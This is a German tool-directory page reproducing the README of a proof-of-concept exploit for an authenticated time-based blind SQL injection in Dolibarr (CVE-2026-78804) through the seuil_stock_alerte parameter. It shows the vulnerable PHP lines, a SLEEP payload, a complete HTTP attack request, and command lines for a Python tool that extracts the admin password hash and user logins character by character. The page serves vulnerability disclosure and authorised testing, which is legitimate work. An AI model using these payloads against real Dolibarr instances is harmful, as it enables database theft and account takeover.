Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-78804_Dolibarr_authenticated_SQL_injection — Die Aktion, die für das Festlegen des lagerbezogenen Bestandswarnschwellenwerts (`seuil_stock_alerte`) verantwortlich ist, akzeptiert benutzergesteuerte Eingaben und bindet diese später ohne ordnungsgemäße numerische Umwandlung oder Parameterbindung in eine SQL-Abfrage ein. #dolibarr #exploit | Kitploit
Tools/GitHubGitHub/repo4chu/cve-2026-78804_dolibarr_authenticated_sql_injection
SchwachstellenanalyseExploitationScripting & AutomatisierungWebanwendungs-ExploitationWebsicherheitPenetrationstestsDatenbanksicherheit
GitHub
repo4chu/cve-2026-78804_dolibarr_authenticated_sql_injection

CVE-2026-78804_Dolibarr_authenticated_SQL_injection

Repository anzeigen
22vor 21 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Die Aktion, die für das Festlegen des lagerbezogenen Bestandswarnschwellenwerts (`seuil_stock_alerte`) verantwortlich ist, akzeptiert benutzergesteuerte Eingaben und bindet diese später ohne ordnungsgemäße numerische Umwandlung oder Parameterbindung in eine SQL-Abfrage ein. #dolibarr #exploit

Teilen

Dolibarr — Authentifizierte SQL-Injection-PoC

SQL-Injection, die die Produktbestandsverwaltungsfunktion über den Parameter seuil_stock_alerte betrifft.

Betroffene Versionen

Getestet und bestätigt auf:

  • 19.0.4
  • 20.0.4
  • 21.0.4
  • 22.0.5
  • 23.0.3
  • 24.0.0 (Es funktionierte bis zur Meldung.)

Verwundbarer Parameter

seuil_stock_alerte

Der Parameter wird akzeptiert von:

/product/stock/product.php

unter Verwendung der Aktion addlimitstockwarehouse.

Ausnutzung

Der Parameter wird ohne numerische Konvertierung abgerufen:

$seuil_stock_alerte = GETPOST('seuil_stock_alerte');

$pse->seuil_stock_alerte = $seuil_stock_alerte;

Anschließend erreicht er eine SQL-Anweisung durch direkte String-Verkettung:

$sql .= ' seuil_stock_alerte = '.
    (isset($this->seuil_stock_alerte)
        ? $this->seuil_stock_alerte
        : "null").',';

Da der Wert in einen nicht in Anführungszeichen gesetzten numerischen Kontext eingefügt wird, kann anstelle eines regulären numerischen Werts ein SQL-Ausdruck angegeben werden.

Zeitbasierte Blind-SQL-Injection

Ein boolescher/zeitbasierter Ausdruck reicht aus, um die Ausführung zu demonstrieren:

(SELECT IF((1=1),SLEEP(15),0))

Beispielparameter:

seuil_stock_alerte=(SELECT IF((1=1),SLEEP(15),0))

Eine erfolgreiche Anfrage erzeugt eine HTTP-Antwortverzögerung von etwa 15 Sekunden, was die Auswertung des injizierten SQL-Ausdrucks bestätigt.

Verwundbare Anfrage

Die verwundbare Aktion kann mit einer authentifizierten Anfrage ähnlich der folgenden erreicht werden:

POST /product/stock/product.php?id=1 HTTP/1.1
Host: target
Cookie: DOLSESSID_xxxxx=<session>
Content-Type: application/x-www-form-urlencoded

action=addlimitstockwarehouse&token=<csrf>&id=1&fk_entrepot=1&desiredstock=1&seuil_stock_alerte=(SELECT IF((1=1),SLEEP(15),0))

Voraussetzungen:

  • Gültige authentifizierte Sitzung
  • CSRF-Token (extrahiert von der Produktkartenseite)
  • Produkt-ID
  • Lager-ID

Authentifizierung & Berechtigungen

Das Problem wurde mit einem authentifizierten Konto reproduziert, das nur über die folgende Berechtigung verfügte:

Product → Create (produit/creer)

— ein Konto mit geringen Rechten, das Produkte erstellen kann.

Auswirkung

Die SQL-Injection ermöglicht:

  1. Blind-zeitbasierte SQL-Injection — Abfragen können über SLEEP-Verzögerungen ausgeführt werden
  2. Informationsoffenlegung — Datenbankinhalte können Zeichen für Zeichen exfiltriert werden
  3. Potenzieller Rechteausweitungsangriff — Extraktion von Admin-Anmeldedaten oder sensiblen Daten
  4. Datenbankaufklärung — Schema-Enumeration über fehler- oder zeitbasierte Methoden

Datenbankseitige Einschränkungen auf diesem System verhinderten die direkte Ausführung von OS-Befehlen.

Exploit-Tool

Das begleitende PoC-Skript stock_sqli_poc.py automatisiert den Ausnutzungsprozess:

Verwendung

python3 stock_sqli_poc.py \
  --url http://127.0.0.1:8088 \
  --proxy http://127.0.0.1:8080 \
  --login webeditor \
  --password 'WebEdit0r!' \
  --product-id 1 \
  --warehouse-id 1 \
  --extract "(SELECT pass_crypted FROM llx_user WHERE admin=1 LIMIT 1)" \
  --length 14

Funktionen

  • Automatische Anmeldung — authentifiziert sich beim Ziel
  • Injection-Bestätigung — validiert die SQL-Injection mit Test-Payloads (1=1 vs 1=2)
  • Binäre Suchextraktion — extrahiert Daten effizient Zeichen für Zeichen mittels ASCII-Vergleich
  • Proxy-Unterstützung — integriert sich mit Burp Suite oder anderen HTTP-Proxys
  • Konfigurierbare Verzögerung — passt die SLEEP-Dauer für Zuverlässigkeit an

Kommandozeilenoptionen

OptionStandardBeschreibung
--urlhttp://127.0.0.1:8088URL der Ziel-Dolibarr-Instanz
--proxyhttp://127.0.0.1:8080HTTP-Proxy (Burp, etc.). Auf leere Zeichenkette setzen zum Deaktivieren
--loginwebeditorBenutzername für Konto mit geringen Rechten
--passwordWebEdit0r!Kontopasswort
--product-id1Anzuvisierende Produkt-ID
--warehouse-id1Anzuvisierende Lager-ID
--delay1.0SLEEP-Dauer in Sekunden für zeitbasierte Erkennung
--extract(SELECT pass_crypted FROM llx_user WHERE admin=1 LIMIT 1)SQL-Ausdruck zum Exfiltrieren
--length14Maximale Zeichenlänge zum Extrahieren

Extraktionsbeispiele

Admin-Passwort-Hash extrahieren:

--extract "(SELECT pass_crypted FROM llx_user WHERE admin=1 LIMIT 1)"

Benutzer aufzählen:

--extract "(SELECT GROUP_CONCAT(login) FROM llx_user)"

Datenbankversion:

--extract "VERSION()"

Aktueller Datenbankbenutzer:

--extract "USER()"

⚠️ Rechtlicher Hinweis: Verwenden Sie diesen Exploit nur gegen Systeme, für die Sie eine ausdrückliche schriftliche Genehmigung besitzen. Unbefugter Zugriff auf Computersysteme ist illegal. Diese PoC wird ausschließlich für Bildungs- und autorisierte Sicherheitstestzwecke bereitgestellt.

Tool herunterladen